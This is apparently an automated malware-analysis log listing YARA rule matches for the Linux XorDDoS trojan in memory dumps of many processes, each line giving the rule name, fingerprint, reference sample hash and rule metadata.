Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
